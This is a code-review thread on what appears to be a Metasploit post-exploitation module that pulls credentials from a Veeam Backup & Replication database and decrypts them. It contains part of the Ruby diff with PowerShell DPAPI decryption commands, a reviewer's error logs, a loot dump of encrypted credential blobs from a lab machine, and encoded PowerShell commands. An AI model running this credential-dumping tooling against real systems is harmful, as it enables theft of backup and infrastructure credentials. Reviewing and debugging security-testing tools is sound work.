modules/post/windows/gather/credentials/veeam_credential_dump.rb

```diff
@@ -0,0 +1,727 @@
+    mssql_instance = mssql_instance_path.split('\\')[1]
+    mssql_db = registry_getvaldata(reg_key, 'db_name').to_s.delete("\000")
+    fail_with(Msf::Exploit::Failure::NoTarget, "Could not read SQL parameters from #{reg_key}") unless mssql_host && mssql_instance && mssql_db
+
+    mssql_login = registry_getvaldata(reg_key, 'db_auth_sql').to_s.delete("\000").to_i
+    if mssql_login > 0
+      mssql_user_enc = registry_getvaldata(reg_key, 'db_login').to_s.delete("\000")
+      mssql_pass_enc = registry_getvaldata(reg_key, 'db_password').to_s.delete("\000")
+    end
+    res = {
+      'DATA SOURCE' => "#{mssql_host}\\#{mssql_instance}",
+      'INITIAL CATALOG' => mssql_db
+    }
+    if mssql_user_enc && mssql_pass_enc
+      cmd_str = "Add-Type -AssemblyName System.Security;[Text.Encoding]::Unicode.GetString([Security.Cryptography.ProtectedData]::Unprotect([Convert]::FromBase64String('#{mssql_user_enc}'), [Convert]::FromBase64String('ewBGADAARgA4AEMAOQBEAEUALQBBAEIAMQBFAC0ANAA4AGIANgAtADgAMgAyADEALQA2ADYANQBFADUAQgAwADEANgBFADcAMAB9AA=='), 'LocalMachine'))"
+      mssql_user = psh_exec(cmd_str)
+      cmd_str = "Add-Type -AssemblyName System.Security;[Text.Encoding]::Unicode.GetString([Security.Cryptography.ProtectedData]::Unprotect([Convert]::FromBase64String('#{mssql_pass_enc}'), [Convert]::FromBase64String('ewBGADAARgA4AEMAOQBEAEUALQBBAEIAMQBFAC0ANAA4AGIANgAtADgAMgAyADEALQA2ADYANQBFADUAQgAwADEANgBFADcAMAB9AA=='), 'LocalMachine'))"
+      mssql_pass = psh_exec(cmd_str)
+    else
+      mssql_pass = nil
+    end
+    if mssql_login == 0
+      res['INTEGRATED SECURITY'] = 'true'
+    elsif mssql_login == 1 && mssql_user && mssql_pass
+      res['USER ID'] = mssql_user
+      res['PASSWORD'] = mssql_pass
+    else
+      fail_with(Msf::Exploit::Failure::NoTarget, 'Failed to extract VOM SQL native login credential')
+    end
+    res
+  end
+
+  def veeam_vbr_decrypt(b64)
+    if b64.is_a?(Array)
+      # Gets around having to call psh_exec for every row at the expense of piling every B64 secret directly into the command line
+      # Limitations of this approach include death when the max command line buffer size is exhausted, YMMV
+      # From the operator's perspective this is controlled by way of the BATCH_DPAPI advanced option, defaulted true; can be unset to make sequential calls to psh_exec instead
+      secrets_ps_array = "@(#{b64.map { |s| "'#{s}'" }.join(',')})"
+      cmd_str = "Add-Type -AssemblyName System.Security;#{secrets_ps_array}|ForEach-Object {[Text.Encoding]::ASCII.GetString([Security.Cryptography.ProtectedData]::Unprotect([Convert]::FromBase64String($_), $Null, 'LocalMachine'))}"
+    elsif b64.is_a?(String)
+      cmd_str = "Add-Type -AssemblyName System.Security;[Text.Encoding]::ASCII.GetString([Security.Cryptography.ProtectedData]::Unprotect([Convert]::FromBase64String('#{b64}'), $Null, 'LocalMachine'))"
+    else
+      return nil
+    end
+    plaintext = psh_exec(cmd_str)
```

Comment:
Hey @npm-cesium137-io, I'm running into an error while testing . On this line, `plaintext` is always being returned as an empty string `""`. There's an issue running the powershell decryption command. When I follow execution to  [line 355 of powershell.rb](https://github.com/rapid7/metasploit-framework/blob/24bf9e5e61e9042a6306ad99576b1bbdb983c34c/lib/msf/core/post/windows/powershell.rb#L355) the contents of `ps_output` are included below:

<details>
<summary>ps_output error</summary>
<p>

```

[1] pry(#<Msf::Modules::Post__Windows__Gather__Credentials__Veeam_credential_dump::MetasploitModule>)> ps_output
=> "#< CLIXML\r\ntIUrcVGR\r\n\x00\r\nRFDzcHmu\r\n<Objs Version=\"1.1.0.1\" xmlns=\"http://schemas.microsoft.com/powershell/2004/04\"><Obj S=\"progress\" RefId=\"0\"><TN RefId=\"0\"><T>System.Management.Automation.PSCustomObject</T><T>System.Object</T></TN><MS><I64 N=\"SourceId\">1</I64><PR N=\"Record\"><AV>Preparing modules for first use.</AV><AI>0</AI><Nil /><PI>-1</PI><PC>-1</PC><T>Completed</T><SR>-1</SR><SD> </SD></PR></MS></Obj><S S=\"Error\">Exception calling \"Unprotect\" with \"3\" argument(s): \"The data is invalid._x000D__x000A_</S><S S=\"Error\">\"_x000D__x000A_</S><S S=\"Error\">At line:1 char:1679_x000D__x000A_</S><S S=\"Error\">+ ... ach-Object {[Text.Encoding]::ASCII.GetString([Security.Cryptography.P ..._x000D__x000A_</S><S S=\"Error\">+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~_x000D__x000A_</S><S S=\"Error\">    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException_x000D__x000A_</S><S S=\"Error\">    + FullyQualifiedErrorId : CryptographicException_x000D__x000A_</S><S S=\"Error\"> _x000D__x000A_</S><S S=\"Error\">Exception calling \"Unprotect\" with \"3\" argument(s): \"The data is invalid._x000D__x000A_</S><S S=\"Error\">\"_x000D__x000A_</S><S S=\"Error\">At line:1 char:1679_x000D__x000A_</S><S S=\"Error\">+ ... ach-Object {[Text.Encoding]::ASCII.GetString([Security.Cryptography.P ..._x000D__x000A_</S><S S=\"Error\">+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~_x000D__x000A_</S><S S=\"Error\">    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException_x000D__x000A_</S><S S=\"Error\">    + FullyQualifiedErrorId : CryptographicException_x000D__x000A_</S><S S=\"Error\"> _x000D__x000A_</S><S S=\"Error\">Exception calling \"Unprotect\" with \"3\" argument(s): \"The data is invalid._x000D__x000A_</S><S S=\"Error\">\"_x000D__x000A_</S><S S=\"Error\">At line:1 char:1679_x000D__x000A_</S><S S=\"Error\">+ ... ach-Object {[Text.Encoding]::ASCII.GetString([Security.Cryptography.P ..._x000D__x000A_</S><S S=\"Error\">+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~_x000D__x000A_</S><S S=\"Error\">    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException_x000D__x000A_</S><S S=\"Error\">    + FullyQualifiedErrorId : CryptographicException_x000D__x000A_</S><S S=\"Error\"> _x000D__x000A_</S><S S=\"Error\">Exception calling \"Unprotect\" with \"3\" argument(s): \"The data is invalid._x000D__x000A_</S><S S=\"Error\">\"_x000D__x000A_</S><S S=\"Error\">At line:1 char:1679_x000D__x000A_</S><S S=\"Error\">+ ... ach-Object {[Text.Encoding]::ASCII.GetString([Security.Cryptography.P ..._x000D__x000A_</S><S S=\"Error\">+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~_x000D__x000A_</S><S S=\"Error\">    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException_x000D__x000A_</S><S S=\"Error\">    + FullyQualifiedErrorId : CryptographicException_x000D__x000A_</S><S S=\"Error\"> _x000D__x000A_</S><S S=\"Error\">Exception calling \"Unprotect\" with \"3\" argument(s): \"The data is invalid._x000D__x000A_</S><S S=\"Error\">\"_x000D__x000A_</S><S S=\"Error\">At line:1 char:1679_x000D__x000A_</S><S S=\"Error\">+ ... ach-Object {[Text.Encoding]::ASCII.GetString([Security.Cryptography.P ..._x000D__x000A_</S><S S=\"Error\">+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~_x000D__x000A_</S><S S=\"Error\">    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException_x000D__x000A_</S><S S=\"Error\">    + FullyQualifiedErrorId : CryptographicException_x000D__x000A_</S><S S=\"Error\"> _x000D__x000A_</S></Objs>"

```
</p>
</details>

Wondering if you might have any guesses as to what's going wrong here? 

<details>
<summary> Module output</summary>
<p>

```

msf6 post(windows/gather/credentials/veeam_credential_dump) > run

[*] Hostname DESKTOP-8ATHH6O IPv4 172.16.199.131
[*] Veeam Backup & Replication Install Path: C:\Program Files\Veeam\Backup and Replication\Backup
[+] Compressed size: 1336
[*] Veeam Backup & Replication Build 11.0.1.1261
[*] Get Veeam SQL Parameters ...
[+] SQL Database Connection Configuration:
[+] 	Instance Name: DESKTOP-8ATHH6O\VEEAMSQL2016
[+] 	Database Name: VeeamBackup
[+] 	Database User: (Windows Integrated)
[!] The database uses Windows authentication
[!] Session identity must have access to the SQL server instance to proceed
[*] Performing export of Veeam Backup & Replication SQL database to CSV file
[*] Export Veeam Backup & Replication DB ...
[+] 6 rows exported, 6 unique IDs
[+] Encrypted Veeam Backup & Replication Database Dump: /Users/jheysel/.msf4/loot/20221228132316_default_172.16.199.131_veeam_vbr_enc_086696.txt
[*] Performing decryption of Veeam Backup & Replication SQL database
[+] 6 VBR rows loaded, 6 unique IDs
[*] Process Veeam Backup & Replication DB ...
[+] Compressed size: 1408
[+] Compressed size: 4780
[-] Post aborted due to failure: no-target: No rows could be processed
[*] Post module execution completed

```
</p>

</details>


As you can see here, there doesn't seem to be an issue collecting the encrypted creds:
<details>
<summary>loot</summary>

<p>

```
131_veeam_vbr_enc_086696.txtdentials/veeam_credential_dump) > cat /Users/jheysel/.msf4/loot/20221228132316_default_172.16.199.
[*] exec: cat /Users/jheysel/.msf4/loot/20221228132316_default_172.16.199.131_veeam_vbr_enc_086696.txt

ID,USN,Username,Password,Description,Visible
D1D23890-7A8C-4F29-91B3-063EFF0A157F,644,test,AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAYYUf9giQJU6FsB/4oBAouwQAAAACAAAAAAAQZgAAAAEAACAAAADXDPupT2tiVFuG+dMqBRh+ccJwwFZp55qMW5L3wdsP7wAAAAAOgAAAAAIAACAAAADuiH9OGYrZmADlcinopKHjEtIAvyoo6pKTZpC7UcxdVxAAAAA4RpLw8vIcxDP5+o10/FlOQAAAAF0XG2RzETPlVc98vYr1XNyKWCI58Ueu+f2J,test,1
70275B03-E805-49E1-9535-1867C62371E2,602,root,AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAYYUf9giQJU6FsB/4oBAouwQAAAACAAAAAAAQZgAAAAEAACAAAABKWyQM+LbW+v2wwjPazUNMOurYeRSKuKojwup6yUci7QAAAAAOgAAAAAIAACAAAADqJiKLLesPdqloHgbYqgXuu+qkKuBlOHq4mKWfq2MArhAAAADOfSobJEZ6gTNC6KZeXq1LQAAAAKfJ3WgV7+Qxd7DnCTuJpd3zLuruztIQDo4m,Helper appliance credentials,1
B5EBAF50-1A63-4C48-839F-5F8A5452520B,603,root,AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAYYUf9giQJU6FsB/4oBAouwQAAAACAAAAAAAQZgAAAAEAACAAAABFDfxN9JQpzlyfhxXZf4Ul/6cO8NJB9tfxBZ0jdMiOUQAAAAAOgAAAAAIAACAAAABKJGZncvxc49kqcA3+yc6+uvZfCV+HSqmtBcG8JzMFkxAAAADJ4AcANiQ+WkFKSIEPrqajQAAAAKvcNtM3hagFq7jLlplFXsXoXZ8cYsr6mDpg,Tenant-side network extension appliance credentials,1
484D83CA-09A3-4FBB-B8BE-66A9217B9D2F,600,msfuser,AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAYYUf9giQJU6FsB/4oBAouwQAAAACAAAAAAAQZgAAAAEAACAAAAAxpFdd3Sn0iqPgsjw6ou5owT8mbhnKWJh+5i8q3zo6ywAAAAAOgAAAAAIAACAAAACb/KQvUlQEDfYFcLBDB05uISwQtisyG5VKa1D4YEhiqSAAAAB0k6x5IeTKKXmHyQnnG/xYmBLlieRUCrmv9YcUyjWIEUAAAAB6HdMmcFVFTHgh,msfuser,1
E379DED2-8DAE-4B9A-B77D-7ED99E8C7152,604,root,AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAYYUf9giQJU6FsB/4oBAouwQAAAACAAAAAAAQZgAAAAEAACAAAADI4x7uh/pnO6Ty06uGUxZC/w5nAj016y2ff+XyXZiwkAAAAAAOgAAAAAIAACAAAAD9swsNBBe6cC1sen4B4SK/m/wteN32IaCUGatJYD2V+iAAAABe5aY5aSxnn055FAR6rT7v4KZiFv1DDSsOm3jmbVgDBEAAAACKzWv5EcQYH7uU,Azure helper appliance credentials,1
FD0041D1-4A68-4ABD-AEFE-B2BF02BB7CA9,83,root,,Provider-side network extension appliance credentials,1

```

</p>
</details>

Reply:
After running the above command directly from powershell on the same machine, I got the same output:
```
PS C:\users\msfuser> Add-Type -AssemblyName System.Security;[Text.Encoding]::ASCII.GetString([Security.Cryptography.ProtectedData]::Unprotect([Convert]::FromBase64String("AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAYYUf9giQJU6FsB/4oBAouwQAAAACAAAAAAAQZgAAAAEAACAAAADXDPupT2tiVFuG+dMqBRh+ccJwwFZp55qMW5L3wdsP7wAAAAAOgAAAAAIAACAAAADuiH9OGYrZmADlcinopKHjEtIAvyoo6pKTZpC7UcxdVxAAAAA4RpLw8vIcxDP5+o10/FlOQAAAAF0XG2RzETPlVc98vYr1XNyKWCI58Ueu+f2J"), $Null, 'LocalMachine'))
Exception calling "Unprotect" with "3" argument(s): "The data is invalid.
"
At line:1 char:40
+ ... em.Security;[Text.Encoding]::ASCII.GetString([Security.Cryptography.P ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifie> 
```

I tried setting `BATCH_DPAPI` to false but still no success.
<details>
<summary> Verbose output </summary>

<p> 

```
msf6 post(windows/gather/credentials/veeam_credential_dump) > set BATCH_DPAPI false
BATCH_DPAPI => false
msf6 post(windows/gather/credentials/veeam_credential_dump) > set verbose true
verbose => true
msf6 post(windows/gather/credentials/veeam_credential_dump) > run

[*] Hostname DESKTOP-8ATHH6O IPv4 172.16.199.131
[*] Veeam Backup & Replication Install Path: C:\Program Files\Veeam\Backup and Replication\Backup
[+] Compressed size: 1336
[+] Final command JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQBBAEUATgBlAHYARwBNACcAKwAnAEMAQQB6AFcATwBPAHcANwBDAE0AQgBCAEUAcgA3AEoAZABvAEkAZwBQAFEAQwBvAGcAZwBOAEsAQQBSAFoARgBJAGsAWgB2AEYAWABoAEkATAAvADMARABzAGcAdAB0AGoAcABGAEMATgA5AFAAUgBtAE4AQwBSAG4ARAB3ADgANwB1AHUAcwA0AGgARwBaAHoAbwBWAFIAMwBpAFMAegBVAEgATgBNAE0AMQBYAEUAbgBlAFAAUgBUAFIAQQB0AG4AYgBXAGcAUgBQAFIARgB7ADAAfQBjAFUARAA1AHkAZwBIAFEASwAnACsAJwBiAGgAVABNAEYAcABpADAAdAA2AHQAVwBQAEEAUwBPAFAAMwBsAHQAZwBqAHsAMgB9AHsAMQB9ADgAbQBsADEAaABpAG0AagBLAG0AMgByAEsAZQA0AGwARQBMAG4AbgBwADYAVgBmAFoAVgBsAFcAbABFAEQAOQBIAHUAMAA1ADYAZAAzADEAJwArACcAcgBmAGgAQwAwAEcAOQBUAEoAeQBmAEEAQQBBAEEAJwApAC0AZgAnAGEAJwAsACcAWQAnACwAJwArACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQBlAGMAaABvACAAJwBLAE8ATABWAEoAZgBMAE0AJwA7AA==
[+] EXECUTING:
powershell.exe -EncodedCommand JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQBBAEUATgBlAHYARwBNACcAKwAnAEMAQQB6AFcATwBPAHcANwBDAE0AQgBCAEUAcgA3AEoAZABvAEkAZwBQAFEAQwBvAGcAZwBOAEsAQQBSAFoARgBJAGsAWgB2AEYAWABoAEkATAAvADMARABzAGcAdAB0AGoAcABGAEMATgA5AFAAUgBtAE4AQwBSAG4ARAB3ADgANwB1AHUAcwA0AGgARwBaAHoAbwBWAFIAMwBpAFMAegBVAEgATgBNAE0AMQBYAEUAbgBlAFAAUgBUAFIAQQB0AG4AYgBXAGcAUgBQAFIARgB7ADAAfQBjAFUARAA1AHkAZwBIAFEASwAnACsAJwBiAGgAVABNAEYAcABpADAAdAA2AHQAVwBQAEEAUwBPAFAAMwBsAHQAZwBqAHsAMgB9AHsAMQB9ADgAbQBsADEAaABpAG0AagBLAG0AMgByAEsAZQA0AGwARQBMAG4AbgBwADYAVgBmAFoAVgBsAFcAbABFAEQAOQBIAHUAMAA1ADYAZAAzADEAJwArACcAcgBmAGgAQwAwAEcAOQBUAEoAeQBmAEEAQQBBAEEAJwApAC0AZgAnAGEAJwAsACcAWQAnACwAJwArACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQBlAGMAaABvACAAJwBLAE8ATABWAEoAZgBMAE0AJwA7AA== -InputFormat None
[+] Cleaning up 11676
[+] EXECUTING:
powershell.exe -EncodedCommand JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQBBAEUAWgBlAHYARwBNAEMAQQA0AHQAMgB6AFMAdgBMAEwATQByAFAAeQAwADMATgBLADQAewAxAH0AMQBzAG4ASgBQAEwAVQBFAFMAQwBFAHMAcwB5AGsAeABNAHkAawBrAHQAMQBsAEEAUABMAFUANAB0AFUAdABmAFUAeQAwADYAdABMAEsANABKAFQAcwAxAEoAVAAnACsAJwBTADcAUgBEAFMANABwAHkAcwB4AEwAVgB3AGcAdAB6AHkAeABPAHEAbwB6AE0AcQBGAEcAJwArACcAdABqAGsAWQAxAEwAQgBpAHIAWQBSAG8AcQA4AFQAbwBxAGUAYQBVADUATwBUAHAAUQBRADIAcwBCADkANQBpAFkASQBvAFEAQQBBAEEAQQB7ADAAfQAnACkALQBmACcAPQAnACwAJwBtACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQBlAGMAaABvACAAJwBLAE8ATABWAEoAZgBMAE0AJwA7AA== -InputFormat None
[*] Veeam Backup & Replication Build 11.0.1.1261
[!] Registry key HKLM\SOFTWARE\Veeam\Veeam ONE Monitor\Service does not exist, Veeam ONE Monitor Server does not appear to be installed
[+] Found SQL client: sqlcmd
[*] Get Veeam SQL Parameters ...
[+] SQL Database Connection Configuration:
[+] 	Instance Name: DESKTOP-8ATHH6O\VEEAMSQL2016
[+] 	Database Name: VeeamBackup
[+] 	Database User: (Windows Integrated)
[!] The database uses Windows authentication
[!] Session identity must have access to the SQL server instance to proceed
[*] Performing export of Veeam Backup & Replication SQL database to CSV file
[*] Export Veeam Backup & Replication DB ...
[+] 6 rows exported, 6 unique IDs
[+] Encrypted Veeam Backup & Replication Database Dump: /Users/jheysel/.msf4/loot/20230109133448_default_172.16.199.131_veeam_vbr_enc_226117.txt
[*] Performing decryption of Veeam Backup & Replication SQL database
[+] 6 VBR rows loaded, 6 unique IDs
[*] Process Veeam Backup & Replication DB ...
[+] Compressed size: 1408
[+] Final command JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQBBAEUAaABlAHYARwBNAEMAQQB6AFcATwB6AFEAcQBDAFEAQgBSAEcAWAAyAFUAVwBnAFEAbgBxAEsAbAByAG8AeQByAFIAbwBZAFIASwBNAHsAMQB9AGsAaABhAFQATwBOAEYAaABmAGwAagA1AG0AcgBNADIAMgBkAFIAeQArADkAdwBEAG4AegBBAFIAMAAzAHUAQwA3ACsAZgAyAGgAZgBOADgAcgB7ADIAfQBQAEcAMgArAEEAeABMAGwAegBJAEoALwBDADEAMAAnACsAJwB3AEMAbwBkADQAaAB5AEkAUQBDAG4AKwAyAEUAUAB1AHMASwByACcAKwAnAFIAYQB3ACsARQBqAFQAUgBoACsAWQBnAC8AMgBPAG8AcAAzAFUAcwBPADMAKwBUAGwASgBZAGIAMQBBAFAAbABwAG4AUgBKADEAZQByAEUAVABoAEMAWAB6AEoAawBhAC8AWABiAHEALwA3AE4AVgBuAEsAVQBCAG4AMQBFAE4AdgBVAHMAUgBFAFMAQwBTAG4ATQBtAEwAbwB5AFAAawA0AEkAZwBEAEQATQBDAG4ANQArADMAcQBtAHcAVgBuAHEAewAwAH0AMwBoADcAcwBlAFgAYgBVAEEAQQBBAEEAJwArACcAPQAnACkALQBmACcAYwAnACwAJwB0ACcALAAnADYAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApAGUAYwBoAG8AIAAnAGQAUwB0AEQAdQBGAFAAZQAnADsA
[+] EXECUTING:
powershell.exe -EncodedCommand JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQBBAEUAaABlAHYARwBNAEMAQQB6AFcATwB6AFEAcQBDAFEAQgBSAEcAWAAyAFUAVwBnAFEAbgBxAEsAbAByAG8AeQByAFIAbwBZAFIASwBNAHsAMQB9AGsAaABhAFQATwBOAEYAaABmAGwAagA1AG0AcgBNADIAMgBkAFIAeQArADkAdwBEAG4AegBBAFIAMAAzAHUAQwA3ACsAZgAyAGgAZgBOADgAcgB7ADIAfQBQAEcAMgArAEEAeABMAGwAegBJAEoALwBDADEAMAAnACsAJwB3AEMAbwBkADQAaAB5AEkAUQBDAG4AKwAyAEUAUAB1AHMASwByACcAKwAnAFIAYQB3ACsARQBqAFQAUgBoACsAWQBnAC8AMgBPAG8AcAAzAFUAcwBPADMAKwBUAGwASgBZAGIAMQBBAFAAbABwAG4AUgBKADEAZQByAEUAVABoAEMAWAB6AEoAawBhAC8AWABiAHEALwA3AE4AVgBuAEsAVQBCAG4AMQBFAE4AdgBVAHMAUgBFAFMAQwBTAG4ATQBtAEwAbwB5AFAAawA0AEkAZwBEAEQATQBDAG4ANQArADMAcQBtAHcAVgBuAHEAewAwAH0AMwBoADcAcwBlAFgAYgBVAEEAQQBBAEEAJwArACcAPQAnACkALQBmACcAYwAnACwAJwB0ACcALAAnADYAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApAGUAYwBoAG8AIAAnAGQAUwB0AEQAdQBGAFAAZQAnADsA -InputFormat None
[+] Cleaning up 800
[+] EXECUTING:
powershell.exe -EncodedCommand JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQBBAEUAdABlAHYARwBNAEMAQQA0AHQAMgB6AFMAdgBMAEwATQByAFAAeQAwADMATgBLADQAbQAxAHMAbgBKAFAATABVAEUAUwBDAEUAcwBzAHkAawB4AE0AeQBrAGsAdAAxAGwAQQBQAEwAVQA0AHQAVQB0AGYAVQB5ADAANgB0AEwASwA0AEoAVABzADEASgBUAFMANwBSAEQAUwA0AHAAeQBzAHgATABWAC8AQQBPADkAQwB6AHkATABTADEASgByADEARwB0AHsAMQB9AGsAWQAxAEwAQgBpAHIAJwArACcAWQBSAG8AcQA4AFQAbwBxAGUAYQBVADUATwBUAHAAUQBRADIAcwBCAHsAMAAnACsAJwB9AFYAZwBjAGkAWQBRAEEAQQBBAEEAPQAnACkALQBmACcAKwAnACwAJwBqACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8